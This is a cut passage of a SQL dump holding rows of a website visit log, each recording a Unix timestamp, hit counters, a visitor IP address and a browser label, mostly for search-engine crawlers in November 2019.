1573765134,1,0,1,0,'66.249.64.26',''),(461374,1573765891,1,1,0,0,'213.180.203.44','other'),(461375,1573766196,1,1,0,0,'137.226.113.42','firefox'),(461376,1573766247,1,1,0,0,'66.249.64.26','chrome'),(461377,1573766252,1,1,0,0,'66.249.70.62','chrome'),(461378,1573766310,1,1,0,0,'66.249.70.36','chrome'),(461379,1573766329,1,1,0,0,'66.249.64.28','chrome'),(461380,1573766330,1,1,0,0,'66.249.64.27','chrome'),(461381,1573766603,1,1,0,0,'157.55.39.117','other'),(461382,1573766937,1,1,0,0,'157.55.39.173','other'),(461383,1573767190,1,1,0,0,'213.180.203.44','other'),(461384,1573768375,1,1,0,0,'141.8.142.161','other'),(461385,1573768983,1,1,0,0,'66.249.70.33','chrome'),(461386,1573768997,1,1,0,0,'66.249.64.28','chrome'),(461387,1573768998,1,1,0,0,'66.249.64.26','chrome'),(461388,1573769852,1,1,0,0,'207.46.13.177','other'),(461389,1573772183,1,1,0,0,'207.46.13.114','other'),(461390,1573772259,2,2,0,0,'8.29.198.25','other'),(461391,1573772492,1,1,0,0,'213.180.203.44','other'),(461392,1573772593,1,1,0,0,'66.249.70.36','chrome'),(461393,1573773163,1,1,0,0,'62.205.134.150','other'),(461394,1573774292,1,1,0,0,'213.180.203.44','other'),(461395,1573774548,2,2,0,0,'157.55.39.173','other'),(461396,1573774574,1,1,0,0,'207.46.13.177','other'),(461397,1573776750,1,1,0,0,'213.180.203.37','other'),(461398,1573777920,1,1,0,0,'213.180.203.44','other'),(461399,1573779182,1,1,0,0,'66.249.64.27','chrome'),(461400,1573779271,1,1,0,0,'141.8.142.2','other'),(461401,1573779896,1,1,0,0,'157.55.39.173','other'),(461402,1573781243,1,1,0,0,'64.246.165.210','firefox'),(461403,1573783109,1,1,0,0,'8.29.198.25','other'),(461404,1573783292,1,1,0,0,'178.154.200.33','other'),(461405,1573783620,1,1,0,0,'8.29.198.27','other'),(461406,1573785153,1,1,0,0,'157.55.39.173','other'),(461407,1573785573,1,1,0,0,'66.249.64.26','chrome'),(461408,1573786883,1,1,0,0,'157.55.39.100','other'),(461409,1573788847,1,1,0,0,'207.46.13.177','other'),(461410,1573789147,1,1,0,0,'5.45.207.65','other'),(461411,1573790433,1,1,0,0,'141.8.142.177','other'),(461412,1573790440,1,1,0,0,'5.45.207.49','other'),(461413,1573790676,1,1,0,0,'157.55.39.110','other'),(461414,1573790904,1,1,0,0,'66.249.64.27','chrome'),(461415,1573792130,1,1,0,0,'157.55.39.110','other'),(461416,1573793944,1,1,0,0,'8.29.198.25','other'),(461417,1573794470,1,1,0,0,'8.29.198.26','other'),(461418,1573796375,1,1,0,0,'157.55.39.110','other'),(461419,1573797124,1,1,0,0,'66.249.70.33','chrome'),(461420,1573797156,1,1,0,0,'38.99.62.94','other'),(461421,1573797747,1,1,0,0,'157.55.39.173','other'),(461422,1573798049,2,2,0,0,'157.55.39.100','other'),(461423,1573798475,1,1,0,0,'207.46.13.177','other'),(461424,1573799631,1,1,0,0,'66.249.70.36','chrome'),(461425,1573799850,1,1,0,0,'207.46.13.177','other'),(461426,1573801178,1,1,0,0,'91.196.177.46','firefox'),(461427,1573802774,1,1,0,0,'157.55.39.173','other'),(461428,1573802999,1,1,0,0,'27.115.124.5','chrome'),(461429,1573803052,1,1,0,0,'66.249.70.33','chrome'),(461430,1573803493,1,1,0,0,'178.154.200.33','other'),(461431,1573803621,1,1,0,0,'91.196.178.86','firefox'),(461432,1573803776,1,1,0,0,'91.196.177.46','chrome'),(461433,1573804120,1,1,0,0,'66.249.64.28','chrome'),(461434,1573804478,1,1,0,0,'91.196.177.46','firefox'),(461435,1573804762,1,1,0,0,'91.196.178.86','firefox'),(461436,1573804790,1,1,0,0,'8.29.198.27','other'),(461437,1573804868,162,162,0,0,'198.50.218.65','other'),(461438,1573804919,1,1,0,0,'91.196.178.187','chrome'),(461439,1573805044,1,1,0,0,'31.13.127.19','other'),(461440,1573805045,1,1,0,0,'31.13.127.22','other'),(461441,1573805323,1,1,0,0,'8.29.198.25','other'),(461442,1573805879,2,1,1,0,'66.249.64.26',''),(461443,1573805975,1,0,1,0,'66.249.64.27',''),(461444,1573806004,1,1,0,0,'209.17.97.82','other'),(461445,1573806270,3,3,0,0,'157.55.39.173','other'),(461446,1573806275,1,1,0,0,'157.55.39.110','other'),(461447,1573806279,1,1,0,0,'157.55.39.176','other'),(461448,1573806589,2,0,2,0,'66.249.70.33',''),(461449,1573806783,1,0,1,0,'66.249.64.26',''),(461450,1573807200,2,2,0,0,'213.180.203.44','other'),(461451,1573807738,162,162,0,0,'198.50.218.65','other'),(461452,1573807767,1,1,0,0,'41.105.112.177','chrome'),(461453,1573807806,1,1,0,0,'195.10.210.70','chrome'),(461454,1573808632,1,1,0,0,'185.233.118.82','firefox'),(461455,1573809570,1,1,0,0,'13.66.139.0','other'),(461456,1573809594,1,1,0,0,'31.13.127.4','other'),(461457,1573809595,1,1,0,0,'31.13.127.5','other'),(461458,1573810064,1,1,0,0,'46.96.7.106','chrome'),(461459,1573810261,1,1,0,0,'91.196.178.84','chrome'),(461460,1573810283,1,1,0,0,'5.45.207.49','other'),(461461,1573810580,1,1,0,0,'185.183.96.122','chrome'),(461462,1573810658,1,1,0,0,'176.120.99.194','chrome'),(461463,1573811237,1,1,0,0,'66.249.64.26','chrome'),(461464,1573811259,1,1,0,0,'13.66.139.0','other'),(461465,1573811358,1,1,0,0,'157.55.39.100','other'),(461466,1573811583,1,1,0,0,'95.108.213.3','other'),(461467,1573811627,1,1,0,0,'18.224.172.230','chrome'),(461468,1573811702,1,1,0,0,'66.249.64.28','chrome'),(461469,1573811974,1,1,0,0,'157.55.39.176','other'),(461470,1573812651,1,1,0,0,'157.55.39.100','other'),(461471,1573812797,2,2,0,0,'157.55.39.173','other'),(461472,1573813752,1,1,0,0,'91.196.178.84','chrome'),(461473,1573813852,1,1,0,0,'95.108.213.55','other'),(461474,1573814391,1,1,0,0,'172.94.64.7','chrome'),(461475,1573814925,1,1,0,0,'157.55.39.173','other'),(461476,1573814974,1,1,0,0,'213.180.203.44','other'),(461477,1573815646,2,2,0,0,'8.29.198.25','other'),(461478,1573816150,1,1,0,0,'213.180.203.44','other'),(461479,1573816920,1,1,0,0,'66.249.64.26','chrome'),(461480,1573817178,1,1,0,0,'109.74.154.72','chrome'),(461481,1573817738,1,1,0,0,'66.249.64.27','chrome'),(461482,1573818534,1,1,0,0,'95.108.181.104','other'),(461483,1573818948,1,1,0,0,'157.55.39.173','other'),(461484,1573819123,1,1,0,0,'209.17.96.210','other'),(461485,1573819506,1,1,0,0,'31.131.28.242','firefox'),(461486,1573819589,1,1,0,0,'213.180.203.37','other'),(461487,1573820040,3,3,0,0,'157.55.39.100','other'),(461488,1573820051,1,1,0,0,'157.55.39.110','other'),(461489,1573820349,1,1,0,0,'37.55.225.231','chrome'),(461490,1573820443,1,1,0,0,'83.169.39.166','other'),(461491,1573820657,1,1,0,0,'213.180.203.44','other'),(461492,1573820742,1,1,0,0,'157.55.39.173','other'),(461493,1573821061,1,1,0,0,'91.196.178.84','chrome'),(461494,1573821274,1,1,0,0,'198.108.66.224','other'),(461495,1573821711,1,1,0,0,'83.169.39.166','other'),(461496,1573822106,1,1,0,0,'91.196.177.15','chrome'),(461497,1573823043,1,1,0,0,'91.196.177.15','chrome'),(461498,1573823741,1,1,0,0,'198.108.66.192','other'),(461499,1573825059,1,1,0,0,'66.249.64.26','chrome'),(461500,1573825934,1,1,0,0,'213.180.203.44','other'),(461501,1573826162,1,1,0,0,'77.122.125.202','chrome'),(461502,1573826500,1,1,0,0,'8.29.198.25','other'),(461503,1573826924,2,2,0,0,'66.249.64.26','chrome'),(461504,1573827020,1,1,0,0,'195.211.62.170','firefox'),(461505,1573827045,1,1,0,0,'8.29.198.27','other'),(461506,1573827130,1,1,0,0,'157.55.39.173','other'),(461507,1573827140,1,1,0,0,'78.152.161.218','chrome'),(461508,1573827170,1,1,0,0,'83.169.39.166','other'),(461509,1573827392,1,1,0,0,'178.154.200.33','other'),(461510,1573827431,1,1,0,0,'213.180.203.44','other'),(461511,1573827432,1,1,0,0,'5.255.253.8','other'),(461512,1573827874,1,1,0,0,'157.55.39.176','other'),(461513,1573829772,1,1,0,0,'157.55.39.100','other'),(461514,1573830082,1,1,0,0,'157.55.39.176','other'),(461515,1573830355,2,2,0,0,'176.103.54.46','firefox'),(461516,1573830942,1,1,0,0,'157.55.39.110','other'),(461517,1573831176,1,1,0,0,'157.55.39.176','other'),(461518,1573831695,1,1,0,0,'66.249.64.26','chrome'),(461519,1573832311,1,1,0,0,'207.46.13.166','other'),(461520,1573832389,2,2,0,0,'157.55.39.100','other'),(461521,1573832962,1,1,0,0,'66.249.64.26','chrome'),(461522,1573833474,1,1,0,0,'213.180.203.37','other'),(461523,1573834070,1,1,0,0,'66.249.64.28','chrome'),(461524,1573835173,1,1,0,0,'198.108.67.16','other'),(461525,1573835270,1,1,0,0,'159.69.124.26','chrome'),(461526,1573835273,18,18,0,0,'159.69.124.26','firefox'),(461527,1573835919,1,1,0,0,'157.55.39.173','other'),(461528,1573835961,1,1,0,0,'207.46.13.166','other'),(461529,1573836515,1,1,0,0,'91.196.178.48','chrome'),(461530,1573836586,1,1,0,0,'66.249.64.26','chrome'),(461531,1573837084,1,1,0,0,'31.207.33.10','chrome'),(461532,1573837090,18,18,0,0,'31.207.33.10','firefox'),(461533,1573837337,1,1,0,0,'8.29.198.27','other'),(461534,1573837495,1,1,0,0,'35.205.241.214','chrome'),(461535,1573837900,1,1,0,0,'8.29.198.25','other'),(461536,1573838831,1,1,0,0,'188.164.199.196','chrome'),(461537,1573838834,18,18,0,0,'188.164.199.196','firefox'),(461538,1573838998,1,1,0,0,'46.211.145.170','chrome'),(461539,1573839575,1,1,0,0,'54.39.100.61','chrome'),(461540,1573839616,1,1,0,0,'131.159.24.47','other'),(461541,1573839697,1,1,0,0,'66.249.64.28','chrome'),(461542,1573839859,1,1,0,0,'157.55.39.176','other'),(461543,1573840196,1,1,0,0,'91.196.178.91','firefox'),(461544,1573840570,1,1,0,0,'37.9.113.33','other'),(461545,1573841493,2,2,0,0,'157.55.39.173','other'),(461546,1573841875,1,1,0,0,'141.8.132.12','other'),(461547,1573842135,1,1,0,0,'66.249.64.27','chrome'),(461548,1573842264,1,1,0,0,'157.55.39.176','other'),(461549,1573844069,1,1,0,0,'157.55.39.100','other'),(461550,1573844337,1,1,0,0,'157.55.39.173','other'),(461551,1573844818,1,1,0,0,'46.211.143.147','chrome'),(461552,1573845834,1,1,0,0,'157.55.39.100','other'),(461553,1573846455,1,1,0,0,'207.46.13.166','other'),(461554,1573847482,1,1,0,0,'207.46.13.166','other'),(461555,1573847814,1,1,0,0,'14.186.56.9','chrome'),(461556,1573847838,1,0,1,0,'66.249.64.26',''),(461557,1573848085,1,1,0,0,'66.249.64.27','chrome'),(461558,1573848172,1,1,0,0,'8.29.198.27','other'),(461559,1573848606,1,1,0,0,'137.226.113.28','other'),(461560,1573848647,1,1,0,0,'137.226.113.34','firefox'),(461561,1573848757,1,1,0,0,'8.29.198.25','other'),(461562,1573849468,1,1,0,0,'66.249.64.26','chrome'),(461563,1573850644,1,1,0,0,'178.154.200.33','other'),(461564,1573851030,1,1,0,0,'137.226.113.34','firefox'),(461565,1573852095,1,1,0,0,'81.133.241.97','other'),(461566,1573854203,1,1,0,0,'66.249.64.27','chrome'),(461567,1573854444,1,1,0,0,'157.55.39.100','other'),(461568,1573854498,1,1,0,0,'37.214.124.43','chrome'),(461569,1573855299,3,3,0,0,'157.55.39.54','other'),(461570,1573855768,1,1,0,0,'178.154.171.40','other'),(461571,1573855783,1,1,0,0,'37.9.113.10','other'),(461572,1573855868,1,1,0,0,'157.55.39.100','other'),(461573,1573856692,1,1,0,0,'157.55.39.176','other'),(461574,1573857190,1,1,0,0,'141.8.142.2','other'),(461575,1573858246,6,6,0,0,'193.148.19.147','other'),(461576,1573858494,1,1,0,0,'141.8.142.161','other'),(461577,1573858526,1,1,0,0,'141.8.142.50','other'),(461578,1573858541,1,1,0,0,'157.55.39.54','other'),(461579,1573859012,1,1,0,0,'8.29.198.26','other'),(461580,1573859614,1,1,0,0,'8.29.198.25','other'),(461581,1573859845,1,1,0,0,'141.8.183.33','other'),(461582,1573859866,6,6,0,0,'193.148.19.147','other'),(461583,1573859873,1,1,0,0,'13.66.139.0','other'),(461584,1573859881,1,1,0,0,'141.8.132.12','other'),(461585,1573860931,1,1,0,0,'91.209.11.236','other'),(461586,1573863963,1,1,0,0,'141.8.142.177','other'),(461587,1573864651,1,1,0,0,'207.46.13.72','other'),(461588,1573865340,1,1,0,0,'95.216.96.242','other'),(461589,1573866076,19,19,0,0,'213.136.92.122','other'),(461590,1573867010,25,25,0,0,'213.136.92.122','other'),(461591,1573867189,241,241,0,0,'95.216.2.253','other'),(461592,1573867918,32,32,0,0,'213.136.92.122','other'),(461593,1573868851,17,17,0,0,'213.136.92.122','other'),(461594,1573869006,1,1,0,0,'213.180.203.44','other'),(461595,1573869020,1,1,0,0,'141.8.132.2','other'),(461596,1573869042,1,1,0,0,'178.154.200.13','other'),(461597,1573869043,1,1,0,0,'46.4.33.48','other'),(461598,1573869136,1,1,0,0,'157.55.39.176','other'),(461599,1573869860,2,2,0,0,'8.29.198.25','other'),(461600,1573870021,21,21,0,0,'213.136.92.122','other'),(461601,1573870777,1,1,0,0,'207.46.13.72','other'),(461602,1573870965,17,17,0,0,'213.136.92.122','other'),(461603,1573871892,21,21,0,0,'213.136.92.122','other'),(461604,1573872830,17,17,0,0,'213.136.92.122','other'),(461605,1573873194,1,1,0,0,'141.8.142.115','other'),(461606,1573873786,19,19,0,0,'213.136.92.122','other'),(461607,1573874692,18,18,0,0,'213.136.92.122','other'),(461608,1573875480,1,1,0,0,'157.55.39.176','other'),(461609,1573875600,17,17,0,0,'213.136.92.122','other'),(461610,1573875736,1,1,0,0,'207.46.13.72','other'),(461611,1573875831,1,1,0,0,'213.180.203.44','other'),(461612,1573876540,13,13,0,0,'213.136.92.122','other'),(461613,1573877508,13,13,0,0,'213.136.92.122','other'),(461614,1573878989,1,1,0,0,'157.55.39.176','other'),(461615,1573880040,1,1,0,0,'207.46.13.173','other'),(461616,1573880704,1,1,0,0,'8.29.198.25','other'),(461617,1573881191,1,1,0,0,'207.46.13.173','other'),(461618,1573881310,1,1,0,0,'8.29.198.27','other'),(461619,1573883908,1,1,0,0,'141.8.183.15','other'),(461620,1573883963,1,1,0,0,'157.55.39.176','other'),(461621,1573883985,1,1,0,0,'141.8.188.25','other'),(461622,1573884024,1,1,0,0,'141.8.142.164','other'),(461623,1573884093,2,2,0,0,'207.46.13.173','other'),(461624,1573886500,1,1,0,0,'141.8.142.115','other'),(461625,1573886565,1,1,0,0,'141.8.188.38','other'),(461626,1573888619,2,2,0,0,'157.55.39.176','other'),(461627,1573889142,1,1,0,0,'207.46.13.173','other'),(461628,1573890800,1,1,0,0,'207.46.13.72','other'),(461629,1573890820,1,1,0,0,'141.8.132.2','other'),(461630,1573890829,1,1,0,0,'141.8.142.50','other'),(461631,1573890896,1,1,0,0,'141.8.188.25','other'),(461632,1573891139,1,1,0,0,'31.13.115.3','other'),(461633,1573891140,1,1,0,0,'31.13.115.15','other'),(461634,1573891141,2,2,0,0,'31.13.115.12','other'),(461635,1573891144,1,1,0,0,'31.13.115.4','other'),(461636,1573891394,1,0,1,0,'66.249.70.62',''),(461637,1573891548,2,2,0,0,'8.29.198.26','other'),(461638,1573892837,1,0,1,0,'66.249.64.27',''),(461639,1573892884,2,0,2,0,'66.249.64.28',''),(461640,1573893590,1,1,0,0,'141.8.188.38','other'),(461641,1573894747,1,1,0,0,'178.154.200.60','other'),(461642,1573897358,1,1,0,0,'66.249.64.26','chrome'),(461643,1573898624,1,1,0,0,'141.8.142.115','other'),(461644,1573898761,1,1,0,0,'91.196.178.184','chrome'),(461645,1573899432,1,1,0,0,'157.55.39.148','other'),(461646,1573899992,1,1,0,0,'95.108.181.104','other'),(461647,1573900021,1,1,0,0,'213.180.203.44','other'),(461648,1573900414,1,1,0,0,'38.99.62.94','other'),(461649,1573901116,1,1,0,0,'5.45.207.49','other'),(461650,1573902385,1,1,0,0,'8.29.198.26','other'),(461651,1573902403,1,1,0,0,'141.8.142.132','other'),(461652,1573902404,1,1,0,0,'141.8.142.128','other'),(461653,1573902439,1,1,0,0,'141.8.183.15','other'),(461654,1573902806,1,1,0,0,'109.74.154.72','chrome'),(461655,1573902822,1,1,0,0,'157.55.39.148','other'),(461656,1573903018,1,1,0,0,'8.29.198.27','other'),(461657,1573903295,1,1,0,0,'141.8.132.2','other'),(461658,1573903332,1,1,0,0,'193.106.30.99','firefox'),(461659,1573904960,1,1,0,0,'141.8.132.12','other'),(461660,1573906316,1,1,0,0,'141.8.142.161','other'),(461661,1573906489,1,1,0,0,'95.108.181.104','other'),(461662,1573906535,1,1,0,0,'141.8.142.50','other'),(461663,1573907355,1,1,0,0,'91.209.11.236','other'),(461664,1573907995,1,1,0,0,'51.68.152.26','chrome'),(461665,1573908815,1,1,0,0,'141.8.188.38','other'),(461666,1573910292,1,1,0,0,'198.108.66.192','other'),(461667,1573911012,1,1,0,0,'157.55.39.148','other'),(461668,1573911245,1,1,0,0,'178.154.200.60','other'),(461669,1573911265,1,1,0,0,'37.9.113.202','other'),(461670,1573912876,1,1,0,0,'91.196.177.238','chrome'),(461671,1573913250,1,1,0,0,'8.29.198.25','other'),(461672,1573913868,1,1,0,0,'8.29.198.26','other'),(461673,1573915350,1,1,0,0,'157.55.39.184','other'),(461674,1573916086,1,1,0,0,'178.128.48.87','firefox'),(461675,1573916345,1,1,0,0,'157.55.39.243','other'),(461676,1573916420,1,1,0,0,'141.8.183.33','other'),(461677,1573917262,1,1,0,0,'157.55.39.243','other'),(461678,1573917538,3,3,0,0,'35.238.252.62','chrome'),(461679,1573917582,3,3,0,0,'34.66.93.203','chrome'),(461680,1573917612,3,3,0,0,'35.224.81.254','chrome'),(461681,1573917626,5,5,0,0,'35.225.28.220','chrome'),(461682,1573917647,2,2,0,0,'35.239.3.35','chrome'),(461684,1573918730,1,1,0,0,'141.8.142.164','other'),(461685,1573919631,1,1,0,0,'80.255.7.98','msie'),(461686,1573919703,1,1,0,0,'198.108.67.16','other'),(461687,1573920347,1,1,0,0,'157.55.39.70','other'),(461688,1573920574,1,1,0,0,'31.13.115.8','other'),(461689,1573920575,2,2,0,0,'31.13.115.7','other'),(461690,1573920631,1,1,0,0,'157.55.39.243','other'),(461691,1573921101,1,1,0,0,'5.45.207.65','other'),(461692,1573922972,1,1,0,0,'157.55.39.184','other'),(461693,1573923448,1,1,0,0,'178.154.200.71','other'),(461694,1573924103,2,2,0,0,'8.29.198.27','other'),(461695,1573924591,1,1,0,0,'141.8.142.161','other'),(461696,1573927582,1,1,0,0,'157.55.39.184','other'),(461697,1573929317,1,0,1,0,'207.46.13.196',''),(461698,1573929641,1,1,0,0,'141.8.142.132','other'),(461699,1573930704,1,1,0,0,'37.9.113.10','other'),(461700,1573930723,1,1,0,0,'141.8.142.161','other'),(461701,1573931526,1,1,0,0,'46.42.136.218','chrome'),(461702,1573931835,1,1,0,0,'141.8.142.161','other'),(461703,1573932695,1,1,0,0,'157.55.39.184','other'),(461704,1573932926,1,1,0,0,'141.8.188.38','other'),(461705,1573932965,1,1,0,0,'37.9.113.163','other'),(461706,1573934024,2,0,2,0,'66.249.64.26',''),(461707,1573934240,1,1,0,0,'141.8.142.50','other'),(461708,1573934577,2,0,2,0,'66.249.70.36',''),(461709,1573934943,1,1,0,0,'8.29.198.26','other'),(461710,1573935579,1,1,0,0,'8.29.198.27','other'),(461711,1573936114,1,0,1,0,'66.249.70.33',''),(461712,1573936331,1,1,0,0,'70.27.55.133','other'),(461713,1573936791,1,0,1,0,'66.249.70.62',''),(461714,1573937683,1,1,0,0,'95.108.213.55','other'),(461715,1573939411,1,1,0,0,'157.55.39.243','other'),(461716,1573941278,1,1,0,0,'141.8.142.177','other'),(461717,1573941291,1,1,0,0,'141.8.142.115','other'),(461718,1573942535,1,1,0,0,'141.8.188.18','other'),(461719,1573943043,1,1,0,0,'157.55.39.45','other'),(461720,1573944205,2,2,0,0,'207.46.13.229','other'),(461721,1573945780,2,2,0,0,'8.29.198.26','other'),(461722,1573946107,1,1,0,0,'37.9.113.33','other'),(461723,1573946111,1,1,0,0,'141.8.188.25','other'),(461724,1573946340,1,0,1,0,'157.55.39.188',''),(461725,1573946856,2,2,0,0,'95.135.90.90','other'),(461726,1573947769,1,1,0,0,'185.183.96.122','firefox'),(461727,1573948046,1,1,0,0,'52.14.175.235','chrome'),(461728,1573948436,1,1,0,0,'157.55.39.188','other'),(461729,1573949739,1,1,0,0,'157.55.39.188','other'),(461730,1573949984,2,0,2,0,'176.62.76.96',''),(461731,1573950125,1,1,0,0,'118.24.106.120','other'),(461732,1573950126,1,1,0,0,'140.143.90.193','other'),(461733,1573951357,1,1,0,0,'141.8.132.12','other'),(461734,1573952773,1,1,0,0,'157.55.39.45','other'),(461735,1573954581,1,1,0,0,'157.55.39.45','other'),(461736,1573954808,1,1,0,0,'54.190.127.2','other'),(461737,1573955443,3,3,0,0,'3.17.27.149','chrome'),(461738,1573956616,1,1,0,0,'8.29.198.25','other'),(461739,1573956782,1,1,0,0,'46.4.33.48','other'),(461740,1573957282,1,1,0,0,'8.29.198.26','other'),(461741,1573958233,1,1,0,0,'13.66.139.0','other'),(461742,1573959903,1,1,0,0,'157.55.39.45','other'),(461743,1573960262,1,0,1,0,'207.46.13.51',''),(461744,1573960586,1,1,0,0,'207.46.13.178','other'),(461745,1573961880,1,1,0,0,'134.175.183.168','other'),(461746,1573962685,1,0,1,0,'207.46.13.51',''),(461747,1573962805,1,0,1,0,'157.55.39.45',''),(461748,1573963440,2,2,0,0,'207.46.13.178','other'),(461749,1573963777,1,1,0,0,'213.180.203.44','other'),(461750,1573965019,1,1,0,0,'207.46.13.178','other'),(461751,1573965054,1,1,0,0,'213.180.203.44','other'),(461752,1573966033,1,1,0,0,'13.66.139.0','other'),(461753,1573967460,1,1,0,0,'8.29.198.26','other'),(461754,1573968124,1,1,0,0,'8.29.198.27','other'),(461755,1573968889,1,1,0,0,'91.196.178.133','firefox'),(461756,1573969615,1,1,0,0,'157.55.39.233','other'),(461757,1573970339,1,1,0,0,'46.211.129.201','chrome'),(461758,1573970769,1,1,0,0,'157.55.39.233','other'),(461759,1573973523,1,1,0,0,'157.55.39.92','other'),(461760,1573975235,1,0,1,0,'66.249.70.33',''),(461761,1573975651,1,1,0,0,'157.55.39.92','other'),(461762,1573975867,1,1,0,0,'37.9.113.163','other'),(461763,1573976961,1,1,0,0,'141.8.183.15','other'),(461764,1573977068,1,1,0,0,'95.108.213.39','other'),(461765,1573977162,1,0,1,0,'66.249.70.33',''),(461766,1573977236,2,0,2,0,'66.249.70.62',''),(461767,1573977298,1,0,1,0,'66.249.64.26',''),(461768,1573978309,2,2,0,0,'8.29.198.26','other'),(461769,1573978720,2,2,0,0,'157.55.39.92','other'),(461770,1573978794,1,0,1,0,'66.249.70.62',''),(461771,1573978814,1,1,0,0,'91.209.11.236','other'),(461772,1573979696,3,3,0,0,'157.55.39.92','other'),(461773,1573980057,2,2,0,0,'157.55.39.233','other'),(461774,1573980545,1,1,0,0,'207.46.13.178','other'),(461775,1573981097,1,1,0,0,'141.8.188.20','other'),(461776,1573981331,2,2,0,0,'157.55.39.233','other'),(461777,1573983689,1,1,0,0,'37.9.113.163','other'),(461778,1573984819,1,1,0,0,'95.108.213.55','other'),(461779,1573984851,1,1,0,0,'66.249.64.28','chrome'),(461780,1573985443,1,1,0,0,'13.66.139.0','other'),(461781,1573986079,1,1,0,0,'157.55.39.233','other'),(461782,1573986270,1,1,0,0,'106.38.241.144','other'),(461783,1573987181,1,1,0,0,'157.55.39.233','other'),(461784,1573988282,1,1,0,0,'109.74.154.72','chrome'),(461785,1573988720,1,1,0,0,'157.55.39.233','other'),(461786,1573988825,1,1,0,0,'141.8.132.37','other'),(461787,1573989179,1,1,0,0,'8.29.198.27','other'),(461788,1573989792,1,1,0,0,'8.29.198.25','other'),(461789,1573990365,1,1,0,0,'37.9.113.33','other'),(461790,1573991589,1,1,0,0,'141.8.188.18','other'),(461791,1573991685,1,1,0,0,'141.8.142.119','other'),(461792,1573993754,1,1,0,0,'141.8.183.33','other'),(461793,1573997311,1,1,0,0,'157.55.39.239','other'),(461794,1573998873,1,1,0,0,'157.55.39.59','other'),(461795,1573999595,1,1,0,0,'95.108.213.55','other'),(461796,1573999598,1,1,0,0,'141.8.183.15','other'),(461797,1574000018,1,1,0,0,'8.29.198.26','other'),(461798,1574000397,1,1,0,0,'157.55.39.59','other'),(461799,1574000489,1,1,0,0,'157.55.39.239','other'),(461800,1574000631,1,1,0,0,'8.29.198.27','other'),(461801,1574000901,1,1,0,0,'141.8.188.20','other'),(461802,1574001980,1,1,0,0,'157.55.39.239','other'),(461803,1574002009,1,1,0,0,'141.8.183.18','other'),(461804,1574002137,1,1,0,0,'141.8.132.12','other'),(461805,1574002792,1,1,0,0,'157.55.39.59','other'),(461806,1574003352,1,1,0,0,'46.211.241.167','chrome'),(461807,1574004612,1,1,0,0,'37.9.113.177','other'),(461808,1574004865,1,1,0,0,'157.55.39.59','other'),(461809,1574005951,1,0,1,0,'157.55.39.59',''),(461810,1574006364,1,1,0,0,'13.66.139.0','other'),(461811,1574007931,1,1,0,0,'38.99.62.94','other'),(461812,1574008070,3,3,0,0,'60.191.38.77','firefox'),(461813,1574008243,1,1,0,0,'141.8.183.33','other'),(461814,1574008537,1,1,0,0,'207.46.13.23','other'),(461815,1574009184,1,1,0,0,'157.55.39.59','other'),(461816,1574009387,1,1,0,0,'141.8.142.132','other'),(461817,1574010166,1,0,1,0,'157.55.39.59',''),(461818,1574010850,1,1,0,0,'181.177.98.53','firefox'),(461819,1574010871,1,1,0,0,'8.29.198.25','other'),(461820,1574011037,1,1,0,0,'37.9.113.202','other'),(461821,1574011039,1,1,0,0,'141.8.188.39','other'),(461822,1574011493,1,1,0,0,'8.29.198.26','other'),(461823,1574012913,1,1,0,0,'87.250.224.104','other'),(461824,1574014290,2,2,0,0,'157.55.39.59','other'),(461825,1574014696,1,1,0,0,'37.9.113.33','other'),(461826,1574015159,1,1,0,0,'91.196.178.184','chrome'),(461827,1574017820,1,1,0,0,'207.46.13.23','other'),(461828,1574019060,1,1,0,0,'157.55.39.59','other'),(461829,1574019334,1,1,0,0,'213.180.203.44','other'),(461830,1574020299,1,1,0,0,'141.8.132.37','other'),(461831,1574020622,1,1,0,0,'188.32.112.205','chrome'),(461832,1574021490,1,1,0,0,'37.9.113.163','other'),(461833,1574021728,2,2,0,0,'8.29.198.27','other'),(461834,1574021861,2,2,0,0,'207.46.13.23','other'),(461835,1574022621,1,1,0,0,'178.154.200.33','other'),(461836,1574022624,1,1,0,0,'141.8.142.161','other'),(461837,1574023731,1,1,0,0,'207.46.13.23','other'),(461838,1574023886,1,1,0,0,'141.8.142.50','other'),(461839,1574023902,1,1,0,0,'66.249.64.28','chrome'),(461840,1574023924,1,1,0,0,'37.9.113.177','other'),(461841,1574024344,1,1,0,0,'66.102.9.164','chrome'),(461842,1574024481,1,1,0,0,'66.249.64.27','chrome'),(461843,1574024985,1,1,0,0,'141.8.142.161','other'),(461844,1574024998,1,1,0,0,'141.8.142.119','other'),(461845,1574025001,1,1,0,0,'5.45.207.44','other'),(461846,1574025035,1,1,0,0,'5.255.253.8','other'),(461847,1574026362,1,1,0,0,'178.154.171.7','other'),(461848,1574026958,1,1,0,0,'207.46.13.23','other'),(461849,1574027753,1,1,0,0,'37.9.113.163','other'),(461850,1574028607,1,1,0,0,'141.8.142.119','other'),(461851,1574029861,1,1,0,0,'37.9.113.97','other'),(461852,1574030395,1,1,0,0,'207.46.13.23','other'),(461853,1574032230,1,1,0,0,'141.8.142.119','other'),(461854,1574032587,2,2,0,0,'8.29.198.25','other'),(461855,1574033404,1,1,0,0,'157.55.39.59','other'),(461856,1574035579,1,0,1,0,'157.55.39.59',''),(461857,1574039177,1,1,0,0,'157.55.39.59','other'),(461858,1574039334,1,1,0,0,'87.250.224.104','other'),(461859,1574040661,1,1,0,0,'141.8.132.2','other'),(461860,1574042957,1,1,0,0,'66.249.64.26','chrome'),(461861,1574043440,1,1,0,0,'8.29.198.26','other'),(461862,1574044073,1,1,0,0,'8.29.198.27','other'),(461863,1574045437,1,1,0,0,'157.55.39.59','other'),(461864,1574047095,1,1,0,0,'213.180.203.37','other'),(461865,1574048164,1,1,0,0,'193.106.30.99','chrome'),(461866,1574051716,1,1,0,0,'66.249.64.27','chrome'),(461867,1574051794,1,1,0,0,'178.154.200.60','other'),(461868,1574051813,1,1,0,0,'141.8.142.119','other'),(461869,1574054122,1,1,0,0,'213.180.203.44','other'),(461870,1574054302,1,1,0,0,'8.29.198.26','other'),(461871,1574054330,1,1,0,0,'141.8.142.132','other'),(461872,1574054919,1,1,0,0,'8.29.198.25','other'),(461873,1574055345,1,1,0,0,'95.108.213.55','other'),(461874,1574055352,1,1,0,0,'141.8.142.50','other'),(461875,1574056078,1,1,0,0,'66.249.64.27','chrome'),(461876,1574057811,1,1,0,0,'141.8.183.18','other'),(461877,1574057815,1,1,0,0,'178.154.171.7','other'),(461878,1574060273,1,1,0,0,'141.8.132.2','other'),(461879,1574061419,1,1,0,0,'37.9.113.97','other'),(461880,1574062528,2,2,0,0,'207.46.13.118','other'),(461881,1574063356,1,1,0,0,'91.196.178.84','chrome'),(461882,1574064235,1,1,0,0,'172.94.64.7','chrome'),(461883,1574064953,1,1,0,0,'91.196.178.73','chrome'),(461884,1574065136,2,2,0,0,'